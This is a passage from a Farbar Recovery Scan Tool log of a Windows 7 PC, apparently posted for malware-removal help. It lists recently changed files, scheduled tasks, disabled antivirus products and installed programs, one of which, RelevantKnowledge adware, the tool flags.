2019-11-18 14:05 - 2009-07-14 05:45 - 000016816 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2019-11-18 14:05 - 2009-07-14 05:45 - 000016816 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2019-11-18 14:03 - 2013-03-19 22:08 - 000746014 _____ C:\Windows\system32\perfh00C.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000740656 _____ C:\Windows\system32\perfh015.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000714178 _____ C:\Windows\system32\prfh0416.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000684052 _____ C:\Windows\system32\perfh00E.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000607286 _____ C:\Windows\system32\perfh008.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000494812 _____ C:\Windows\system32\perfh014.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000479312 _____ C:\Windows\system32\perfh001.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000417076 _____ C:\Windows\system32\perfh011.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000171600 _____ C:\Windows\system32\perfc00E.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000156198 _____ C:\Windows\system32\perfc015.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000149906 _____ C:\Windows\system32\perfc00C.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000147982 _____ C:\Windows\system32\prfc0416.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000122426 _____ C:\Windows\system32\perfc011.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000111454 _____ C:\Windows\system32\perfc008.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000095730 _____ C:\Windows\system32\perfc014.dat
2019-11-18 14:03 - 2013-03-19 22:08 - 000095098 _____ C:\Windows\system32\perfc001.dat
2019-11-18 14:03 - 2013-03-19 15:24 - 000481800 _____ C:\Windows\system32\perfh00B.dat
2019-11-18 14:03 - 2013-03-19 15:24 - 000101846 _____ C:\Windows\system32\perfc00B.dat
2019-11-18 14:03 - 2009-07-14 06:13 - 007211860 _____ C:\Windows\system32\PerfStringBackup.INI
2019-11-18 14:03 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2019-11-18 13:58 - 2018-07-17 21:31 - 000000000 ____D C:\Users\Vladana\AppData\Local\AVAST Software
2019-11-18 13:54 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-11-18 13:46 - 2017-09-05 15:33 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Mp3tag
2019-11-18 02:26 - 2014-10-19 23:52 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\vlc
2019-11-17 22:16 - 2013-02-21 01:36 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Azureus
2019-11-17 02:16 - 2013-02-20 22:41 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2019-11-16 17:47 - 2019-05-23 11:52 - 000003160 _____ C:\Windows\system32\Tasks\{EF41326F-22E8-4DCF-A020-C6061802D389}
2019-11-16 17:47 - 2018-09-06 18:23 - 000003334 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2019-11-16 17:47 - 2018-09-06 18:23 - 000003206 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2019-11-16 17:47 - 2018-03-14 03:40 - 000004470 _____ C:\Windows\system32\Tasks\Adobe Flash Player NPAPI Notifier
2019-11-16 17:47 - 2017-09-02 20:05 - 000003488 _____ C:\Windows\system32\Tasks\igfxhk
2019-11-16 17:47 - 2016-03-23 08:37 - 000003052 _____ C:\Windows\system32\Tasks\SafeZone scheduled Autoupdate 1458718670
2019-11-16 17:47 - 2016-01-03 12:45 - 000003652 _____ C:\Windows\system32\Tasks\DivXUpdate
2019-11-16 17:47 - 2015-12-03 22:42 - 000000000 ____D C:\Windows\system32\Tasks\AVAST Software
2019-11-16 17:47 - 2015-06-10 12:59 - 000004458 _____ C:\Windows\system32\Tasks\Adobe Flash Player PPAPI Notifier
2019-11-16 17:47 - 2015-06-10 12:47 - 000003850 _____ C:\Windows\system32\Tasks\Opera scheduled Autoupdate 1433936833
2019-11-16 17:47 - 2015-02-06 11:56 - 000003432 _____ C:\Windows\system32\Tasks\RealDownloader Update Check
2019-11-16 17:47 - 2015-01-06 11:27 - 000004476 _____ C:\Windows\system32\Tasks\Adobe Acrobat Update Task
2019-11-16 17:47 - 2014-07-14 00:42 - 000003226 _____ C:\Windows\system32\Tasks\{375818AB-9982-4CB0-BF65-E9B77DBF0F5C}
2019-11-16 17:47 - 2013-07-27 16:59 - 000003176 _____ C:\Windows\system32\Tasks\{9194DE95-4B06-4F9D-B927-18DB5B401FBF}
2019-11-16 17:47 - 2013-03-15 02:37 - 000003192 _____ C:\Windows\system32\Tasks\{6243CAD4-3DB1-45D4-933D-254A23B4CA85}
2019-11-16 17:47 - 2013-02-28 00:53 - 000003390 _____ C:\Windows\system32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-16 17:47 - 2013-02-21 21:07 - 000003508 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000UA
2019-11-16 17:47 - 2013-02-21 21:07 - 000003236 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000Core
2019-11-16 17:47 - 2013-02-21 15:09 - 000003050 _____ C:\Windows\system32\Tasks\{3A66CE80-4733-4203-9F7A-462BED78E89F}
2019-11-16 17:47 - 2013-02-20 22:41 - 000004312 _____ C:\Windows\system32\Tasks\Adobe Flash Player Updater
2019-11-16 17:46 - 2019-05-23 15:50 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2019-11-16 16:21 - 2013-02-20 22:23 - 000000000 ____D C:\Users\Vladana\AppData\Local\Microsoft Help
2019-11-16 15:55 - 2014-08-18 11:50 - 000000000 ____D C:\Program Files (x86)\Freemake
2019-11-16 14:54 - 2017-07-25 15:43 - 000000000 ____D C:\Users\Vladana\AppData\Local\FreemakeVideoConverter
2019-11-16 14:54 - 2014-08-18 11:50 - 000000000 ____D C:\ProgramData\Freemake
2019-11-16 13:48 - 2017-08-25 02:23 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ZenGuard GmbH
2019-11-15 19:04 - 2017-08-25 02:23 - 000000000 ____D C:\Users\Vladana\AppData\Local\SquirrelTemp
2019-11-15 17:02 - 2013-02-20 21:51 - 000000000 ____D C:\Users\Vladana\AppData\Local\Google
2019-11-13 21:40 - 2013-02-20 22:41 - 000842296 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe
2019-11-13 21:40 - 2013-02-20 22:41 - 000175160 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2019-11-13 21:40 - 2013-02-20 22:41 - 000000000 ____D C:\Windows\system32\Macromed
2019-11-11 15:42 - 2016-09-25 12:57 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Apowersoft
2019-11-11 01:33 - 2017-03-14 00:19 - 000004168 _____ C:\Windows\system32\Tasks\Avast Emergency Update
2019-11-11 01:28 - 2013-02-20 21:52 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2019-11-09 12:32 - 2017-04-16 10:33 - 000000000 ____D C:\Users\Vladana\AppData\LocalLow\Mozilla
2019-11-08 01:14 - 2018-09-06 18:24 - 000002184 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-11-08 01:14 - 2018-09-06 18:24 - 000002143 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2019-11-08 01:14 - 2018-09-06 18:24 - 000002143 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2019-11-07 18:44 - 2015-06-10 12:47 - 000000000 ____D C:\Program Files (x86)\Opera
2019-11-06 11:30 - 2016-09-05 13:58 - 000001271 _____ C:\Users\Vladana\Desktop\marker.txt
2019-11-05 05:03 - 2013-02-20 21:52 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Mozilla
2019-11-05 00:06 - 2015-10-15 21:00 - 000000000 ____D C:\Program Files (x86)\Google
2019-10-22 01:05 - 2017-09-05 14:37 - 000000000 ____D C:\Program Files (x86)\Mp3tag
 
==================== Files in the root of some directories ========
 
2013-04-12 20:07 - 2014-11-17 02:37 - 000000580 _____ () C:\Users\Vladana\AppData\Roaming\AutoGK.ini
2013-03-15 02:55 - 2014-11-18 03:36 - 000010752 _____ () C:\Users\Vladana\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-05-19 01:43 - 2015-05-19 01:43 - 000247298 _____ () C:\Users\Vladana\AppData\Local\Tempdivx84f8
2015-07-02 22:06 - 2015-07-02 22:06 - 000043682 _____ () C:\Users\Vladana\AppData\Local\Tempdivxffab
 
==================== SigCheck ============================
 
(There is no automatic fix for files that do not pass verification.)
 
 
LastRegBack: 2019-11-17 06:56
==================== End of FRST.txt ========================
 
 
And here is the copy of Addition.txt:
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14-11-2019
Ran by Vladana (18-11-2019 14:55:27)
Running from C:\Users\Vladana\Desktop
Windows 7 Ultimate (X64) (2013-02-20 19:53:32)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-7682389-3612777877-391866582-500 - Administrator - Disabled)
Guest (S-1-5-21-7682389-3612777877-391866582-501 - Limited - Disabled)
Vladana (S-1-5-21-7682389-3612777877-391866582-1000 - Administrator - Enabled) => C:\Users\Vladana
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Avast Antivirus (Disabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Disabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
4K Video Downloader (HKLM-x32\...\4K Video Downloader) (Version:  - Open Media LLC)
ACDSee 10 Photo Manager (HKLM-x32\...\{F8B98EB6-FC06-45BF-87D4-9784E0408611}) (Version: 10.0.219 - ACD Systems International)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20063 - Adobe Systems Incorporated)
Adobe Flash Player 32 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 32.0.0.293 - Adobe)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.293 - Adobe)
Adobe Flash Player 32 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 32.0.0.293 - Adobe)
Adobe Shockwave Player 12.3 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.3.4.204 - Adobe Systems, Inc.)
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version:  - ALPS ELECTRIC CO., LTD.)
Apowersoft Online Launcher version 1.6.1 (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\{20BF67A8-D81A-4489-8225-FABAA0896E2D}_is1) (Version: 1.6.1 - APOWERSOFT LIMITED)
Auto Gordian Knot 2.55 (HKLM-x32\...\AutoGK) (Version: 2.55 - len0x)
Avast Free Antivirus (HKLM-x32\...\Avast Antivirus) (Version: 19.8.2393 - AVAST Software)
AVI ReComp 1.5.5 (HKLM-x32\...\AVI ReComp) (Version: 1.5.5 - Mateusz Gola (aka Prozac))
AviSynth 2.5 (HKLM-x32\...\AviSynth) (Version:  - )
Awesomium.NET Redistribution Module (HKLM-x32\...\{C34CAF35-6198-4EEB-970F-C61FC51D23BD}) (Version: 1.7.4.2 - ©2014 Awesomium Technologies LLC) Hidden
Bigasoft Total Video Converter 3.7.24.4700 (HKLM-x32\...\{a72ce741-1f32-4d79-bffb-a714375c678d}_is1) (Version:  - Bigasoft Corporation)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DivX Setup (HKLM\...\DivX Setup) (Version: 10.8.7.0 - DivX, LLC)
FileLab Plugin 1.1.33 (HKLM-x32\...\{6AC5F630-9453-433D-90FF-BB3A8E4F8960}) (Version: 1.1.33 - FileLab)
FJ Camera (HKLM-x32\...\{399C37FB-08AF-493B-BFED-20FBD85EDF7F}) (Version: 5.8.52032.0_WHQL - Sonix)
Freemake Video Converter version 4.1.10 (HKLM-x32\...\Freemake Video Converter_is1) (Version: 4.1.10 - Mixbyte Inc.)
Fujitsu Hotkey Utility (HKLM-x32\...\{C8E4B31D-337C-483D-822D-16F11441669B}) (Version: 3.70.0.0 - FUJITSU LIMITED) Hidden
Fujitsu Hotkey Utility (HKLM-x32\...\InstallShield_{C8E4B31D-337C-483D-822D-16F11441669B}) (Version: 3.70.0.0 - FUJITSU LIMITED)
Fujitsu MobilityCenter Extension Utility (HKLM\...\{EC314CDF-3521-482B-A21C-65AC95664814}) (Version: 4.01.00.000 - FUJITSU LIMITED) Hidden
Fujitsu MobilityCenter Extension Utility (HKLM-x32\...\InstallShield_{EC314CDF-3521-482B-A21C-65AC95664814}) (Version: 4.01.00.000 - FUJITSU LIMITED)
Fujitsu System Extension Utility (HKLM\...\{E8A5B78F-4456-4511-AB3D-E7BFFB974A7A}) (Version: 3.4.4.0 - FUJITSU LIMITED) Hidden
Fujitsu System Extension Utility (HKLM-x32\...\InstallShield_{E8A5B78F-4456-4511-AB3D-E7BFFB974A7A}) (Version: 3.4.4.0 - FUJITSU LIMITED)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 78.0.3904.97 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.341 - Google LLC) Hidden
Google Video Support Plugin (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\{F9B579C2-D854-300A-BE62-A09EB9D722E4}) (Version: 19.11.1200.0 - Google, LLC.)
Hotspot Shield 9.21.3 Pre-Active (HKLM\...\{719C64E2-9BD5-4C6B-A13B-36E1DD27B015}) (Version: 9.21.3.11422 - hss721.blogspot.com) Hidden
Hotspot Shield 9.21.3 Pre-Active (HKLM\...\Hotspot Shield 9.21.3 Pre-Active 9.21.3.11422) (Version: 9.21.3.11422 - hss721.blogspot.com)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel® OpenCL CPU Runtime (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version:  - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2696 - Intel Corporation)
Intel® PROSet/Wireless for Bluetooth® + High Speed (HKLM\...\{705EE775-5776-48FD-B704-C3C9CF535420}) (Version: 15.1.1.0170 - Intel Corporation)
Intel® PROSet/Wireless Software for Bluetooth® Technology (HKLM\...\{F0932859-AA60-459E-B843-0BDECA34E2C7}) (Version: 2.0.0.0086 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.0.0.1032 - Intel Corporation)
Intel® PROSet/Wireless WiFi Software (HKLM\...\{BAA0BE9B-9E6D-4802-91CB-FB7ED5CD4BEF}) (Version: 15.01.1500.1034 - Intel Corporation)
iPool (HKLM-x32\...\iPool) (Version: 2.2.03 - Memir Games)
iSnooker 2.2.60 (HKLM-x32\...\isnooker_memir_is1) (Version: 2.2.60 - Memir Games Ltd)
Java 8 Update 221 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180221F0}) (Version: 8.0.2210.11 - Oracle Corporation)
KeepVid Pro(Build 6.3.2.0) (HKLM-x32\...\KeepVid Pro_is1) (Version: 6.3.2.0 - KeepVid Studio)
LIFEBOOK Application Panel (HKLM\...\{6226477E-444F-4DFE-BA19-9F4F7D4565BC}) (Version: 8.3.2.0 - FUJITSU LIMITED) Hidden
LIFEBOOK Application Panel (HKLM-x32\...\InstallShield_{6226477E-444F-4DFE-BA19-9F4F7D4565BC}) (Version: 8.3.2.0 - FUJITSU LIMITED)
Malwarebytes version 3.4.5.2467 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.4.5.2467 - Malwarebytes)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Save as PDF or XPS Add-in for 2007 Microsoft Office programs (HKLM-x32\...\{90120000-00B2-0409-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\SkyDriveSetup.exe) (Version: 17.0.2006.0314 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Movie Maker (HKLM-x32\...\{5BABDA39-61CF-41EE-992D-4054B6649A9B}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{ED6C77F9-4D7E-447C-9EC0-9A212D075535}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Mozilla Firefox 70.0.1 (x64 en-US) (HKLM\...\Mozilla Firefox 70.0.1 (x64 en-US)) (Version: 70.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 70.0.1.7242 - Mozilla)
Mp3tag v2.99a (HKLM-x32\...\Mp3tag) (Version: 2.99a - Florian Heidenreich)
MSVC80_x64_v2 (HKLM\...\{4D668D4F-FAA2-4726-834C-31F4614F312E}) (Version: 1.0.3.0 - Nokia) Hidden
MSVC80_x86_v2 (HKLM-x32\...\{6D3245B1-8DB8-4A23-9CD2-2C90F40ABAF6}) (Version: 1.0.3.0 - Nokia) Hidden
MSVC90_x64 (HKLM\...\{AB071C8B-873C-459F-ACA9-9EBE03C3E89B}) (Version: 1.0.1.2 - Nokia) Hidden
MSVC90_x86 (HKLM-x32\...\{AF111648-99A1-453E-81DD-80DBBF6DAD0D}) (Version: 1.0.1.2 - Nokia) Hidden
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Nero 8 (HKLM-x32\...\{B944FA21-81AF-4A77-8328-CE4F4CC51033}) (Version: 8.10.21 - Nero AG)
Noise Reduction Plug-In 2.0 (HKLM-x32\...\{B94515E1-2DD6-11E2-849E-F04DA23A5C58}) (Version: 2.0.515 - Sony)
Nokia Connectivity Cable Driver (HKLM-x32\...\{29373274-977E-413C-A4DE-DC0F8E80C429}) (Version: 7.1.172.0 - Nokia)
Nokia PC Suite (HKLM-x32\...\{866C4563-ED53-43F3-A29D-8BEE2BD1BA3C}) (Version: 7.1.180.94 - Nokia) Hidden
Nokia PC Suite (HKLM-x32\...\Nokia PC Suite) (Version: 7.1.180.94 - Nokia)
Nokia Software Updater (HKLM-x32\...\{7130468A-F53F-4698-8C09-A339EA3B05E6}) (Version: 3.0.655 - Nokia)
Nokia Suite (HKLM-x32\...\{88B6F9DE-C80F-4A70-ACF6-BEE933679170}) (Version: 3.8.54.0 - Nokia) Hidden
Nokia Suite (HKLM-x32\...\Nokia Suite) (Version: 3.8.54.0 - Nokia)
Opera Stable 64.0.3417.92 (HKLM-x32\...\Opera 64.0.3417.92) (Version: 64.0.3417.92 - Opera Software)
PC Connectivity Solution (HKLM-x32\...\{6D01D1B1-17BD-4F10-BB11-F08F0C47D42B}) (Version: 12.0.109.0 - Nokia)
PeaZip 5.2.0 (HKLM-x32\...\{5A2BC38A-406C-4A5B-BF45-6991F9A05325}_is1) (Version:  - Giorgio Tani)
Plugfree NETWORK (HKLM\...\{7BA64D21-EE46-4a9a-8145-52B0175C3F86}) (Version: 6.2.0.1 - FUJITSU LIMITED)
Plugfree NETWORK (HKLM\...\{E1C056BE-ACC9-4FCF-B37D-55A46648B369}) (Version: 6.2.001 - FUJITSU LIMITED) Hidden
Power Saving Utility (HKLM-x32\...\{49A588CF-5FD4-4774-BFBF-0764287DE82B}) (Version: 32.01.10.043 - FUJITSU LIMITED)
QuickTime 7 (HKLM-x32\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.)
RealDownloader (HKLM-x32\...\{6FCD4D5A-20B9-4D79-ABA5-4E7048944025}) (Version: 17.0.15.4 - RealNetworks, Inc.) Hidden
RealDownloader (HKLM-x32\...\{e6171278-8759-449d-9e0b-c1825debc2ad}) (Version: 17.0.15.7 - RealNetworks) Hidden
RealDownloader (HKLM-x32\...\{FBEFDC9E-F8FB-4B66-A78B-09B7B380D59D}) (Version: 17.0.15.7 - RealNetworks) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (HKLM-x32\...\{7770E71B-2D43-4800-9CB3-5B6CAAEBEBEA}) (Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (HKLM\...\{21E47F47-C9A7-4454-BA48-388327B0EA00}) (Version: 10.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (HKLM-x32\...\{AAECF7BA-E83B-4A10-87EA-DE0B333F8734}) (Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer Cloud (HKLM-x32\...\RealPlayer 17.0) (Version: 17.0.15 - RealNetworks)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.53.216.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6526 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7601.30129 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (HKLM-x32\...\{28C2DED6-325B-4CC7-983A-1777C8F7FBAB}) (Version: 1.1.0 - RealNetworks, Inc.) Hidden
RelevantKnowledge (HKLM-x32\...\{d08d9f98-1c78-4704-87e6-368b0023d831}) (Version:  - ) <==== ATTENTION
SafeZone Stable 1.48.2066.44 (HKLM-x32\...\SafeZone 1.48.2066.44) (Version: 1.48.2066.44 - Avast Software) Hidden
SolveigMM AVI Trimmer (HKLM-x32\...\SolveigMM AVI Trimmer 2.0.1210.11) (Version: 2.0.1210.11 - Solveig Multimedia)
Sound Forge Pro 10.0 (HKLM-x32\...\{8EF5E2B0-2DD1-11E2-89A5-F04DA23A5C58}) (Version: 10.0.507 - Sony)
Spotify (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Spotify) (Version: 1.1.8.439.g8502297d - Spotify AB)
Subtitle Edit 3.4.3 (HKLM-x32\...\SubtitleEdit_is1) (Version: 3.4.3.0 - Nikse)
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Total Commander (Remove or Repair) (HKLM-x32\...\Totalcmd) (Version:  - )
Unity Web Player (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
UpdateService (HKLM-x32\...\{E3AE96D6-E196-45B4-AF62-2B41998B9E37}) (Version: 1.0.0 - RealNetworks, Inc.) Hidden
VC80CRTRedist - 8.0.50727.6195 (HKLM-x32\...\{933B4015-4618-4716-A828-5289FC03165F}) (Version: 1.2.0 - DivX, Inc) Hidden
VCRedistSetup (HKLM-x32\...\{3921A67A-5AB1-4E48-9444-C71814CF3027}) (Version: 1.0.0 - Nero AG) Hidden
Video Download Capture version 6.2.8 (HKLM-x32\...\{b3336f66-e079-4ff6-abdb-51e2fab781d5}_is1) (Version: 6.2.8 - APOWERSOFT LIMITED)
Video Downloader (HKLM-x32\...\{62796191-6F12-4ABE-BA8B-B4D4A266C997}) (Version: 1.0.0 - RealNetworks) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.8 - VideoLAN)
VobSub v2.23 (Remove Only) (HKLM-x32\...\VobSub) (Version:  - )
Vuze (HKLM-x32\...\8461-7759-5462-8226) (Version: 5.7.6.0 - Azureus Software, Inc.)
Winamp (HKLM-x32\...\Winamp) (Version: 5.623  - Nullsoft, Inc)
Winamp Detector Plug-in (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Winamp Detect) (Version: 1.0.0.1 - Nullsoft, Inc)
Windows Driver Package - Nokia Modem  (02/25/2011 4.7) (HKLM\...\E0AC723A3DE3A04256288CADBBB011B112AED454) (Version: 02/25/2011 4.7 - Nokia)
Windows Driver Package - Nokia Modem  (02/25/2011 7.01.0.9) (HKLM\...\72A50F48CC5601190B9C4E74D81161693133E7F7) (Version: 02/25/2011 7.01.0.9 - Nokia)
Windows Driver Package - Nokia pccsmcfd LegacyDriver  (05/31/2012 7.1.2.0) (HKLM\...\62BBD193ADFDBB228C7E1ADB56463F5732FF7F6F) (Version: 05/31/2012 7.1.2.0 - Nokia)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)
WinRAR archiver (HKLM-x32\...\WinRAR archiver) (Version:  - )
Wondershare Filmora(Build 8.5.3) (HKLM\...\Wondershare Filmora_is1) (Version:  - Wondershare Software)
Wondershare Helper Compact 2.5.2 (HKLM-x32\...\{5363CE84-5F09-48A1-8B6C-6BB590FFEDF2}_is1) (Version: 2.5.2 - Wondershare)
XviD MPEG4 Video Codec (remove only) (HKLM-x32\...\XviD MPEG4 Video Codec) (Version:  - )
ZD Soft Screen Recorder 11.2.0 (HKLM-x32\...\{05289906-8CDE-44FD-9FA5-95866BF511A9}) (Version: 11.2.0.0 - ZD Soft)
 
==================== Custom CLSID (Whitelisted): ==============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll => No File
